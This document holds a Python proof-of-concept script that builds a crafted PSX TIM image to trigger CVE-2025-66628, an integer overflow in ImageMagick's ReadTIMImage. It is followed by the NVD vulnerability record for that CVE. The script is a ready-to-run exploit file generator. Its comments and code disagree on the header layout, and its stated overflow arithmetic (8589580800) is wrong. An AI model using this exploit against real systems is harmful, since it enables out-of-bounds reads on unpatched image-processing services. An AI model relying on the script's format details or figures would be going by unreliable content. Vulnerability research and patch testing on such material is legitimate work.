CVE-2025-66628

import struct import sys def create_malicious_tim_file(filename, width=65535, height=65535): """ Generate a malicious TIM image file to trigger integer overflow in ImageMagick CVE-2025-66628: Integer overflow in ReadTIMImage function (coders/tim.c) The TIM file format header contains: - Width and Height as 16-bit values - Calculation: image_size = 2 * width * height - When width=height=65535: 2*65535*65535 = 8589580800 (overflows on 32-bit) """ # TIM file header structure # Bytes 0-3: TIM signature (typically 0x00000010) # Bytes 4-7: Image type and flags # Bytes 8-11: Width (16-bit, little-endian) # Bytes 12-15: Height (16-bit, little-endian) with open(filename, 'wb') as f: # TIM header f.write(struct.pack('<I', 0x00000010)) # TIM signature f.write(struct.pack('<I', 0x00000000)) # Type/flags f.write(struct.pack('<H', width)) # Width (16-bit) f.write(struct.pack('<H', height)) # Height (16-bit) # Add minimal image data to pass initial validation # The overflow occurs during size calculation before data validation f.write(b'\x00' * 16) print(f"Malicious TIM file created: {filename}") print(f"Width: {width}, Height: {height}") print(f"Calculated size: {2 * width * height}") print(f"On 32-bit systems, this will overflow and wrap to: {(2 * width * height) & 0xFFFFFFFF}") if __name__ == '__main__': if len(sys.argv) > 1: create_malicious_tim_file(sys.argv[1]) else: create_malicious_tim_file('exploit_cve_2025_66628.tim')

{"cve": {"id": "CVE-2025-66628", "sourceIdentifier": "[email protected]", "published": "2025-12-10T22:16:28.660", "lastModified": "2026-01-06T18:17:40.147", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ImageMagick is a software suite to create, edit, compose, or convert bitmap images. In versions 7.1.2-9 and prior, the TIM (PSX TIM) image parser contains a critical integer overflow vulnerability in its ReadTIMImage function (coders/tim.c). The code reads width and height (16-bit values) from the file header and calculates image_size = 2 * width * height without checking for overflow. On 32-bit systems (or where size_t is 32-bit), this calculation can overflow if width and height are large (e.g., 65535), wrapping around to a small value. This results in a small heap allocation via AcquireQuantumMemory and later operations relying on the dimensions can trigger an out of bounds read. This issue is fixed in version 7.1.2-10."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.1.2-10", "matchCriteriaId": "189F420B-9B0E-4AB1-9D20-3D7E5ACCBDEE"}]}]}], "references": [{"url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-6hjr-v6g4-3fm8", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/dlemstra/Magick.NET/commit/2dfa08e15cfd11016a79615994787b14f9048b1c", "source": "[email protected]", "tags": ["Patch"]}]}}